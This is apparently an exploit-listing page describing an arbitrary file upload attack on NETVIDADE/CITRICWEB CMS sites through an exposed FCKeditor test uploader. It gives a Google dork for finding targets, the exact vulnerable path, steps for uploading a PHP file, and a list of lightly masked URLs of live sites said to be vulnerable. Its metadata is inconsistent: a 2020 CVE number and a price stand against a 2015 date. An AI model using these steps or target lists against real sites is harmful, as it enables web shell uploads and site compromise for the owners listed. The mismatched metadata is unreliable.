Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-15848 | CWE-434 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2015-04-14 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
[+] Exploit Title : NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://www.citricweb.pt [+] Google Dork : "Desenvolvido por netvidade.com" [+] Date: 2015-04-14 [+] Tested On : Windows 7 / Mozilla Firefox [+] Version : All Version [+]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #%# CITRICWEB (FCKEDITOR) : [+] Exploit => plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] First Go To => http://site.com/[path] [+] Then => http://www.site.com/[path]/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] Select => Select the "File Uploader"> Php ... Upload to : Uploaded File URL: [+] Demos : [+] http://contamiXga.pt/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://prestenergia.coXm/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://grasil-confeccoXes.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://alojamentomXonfortinho.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://projectomilXenium.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+][+][+][+][+][+][+][+][+][+][+] [+]Discovered By : Cyb3r_Dr4in[+] [+][+][+][+][+][+][+][+][+][+][+]
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.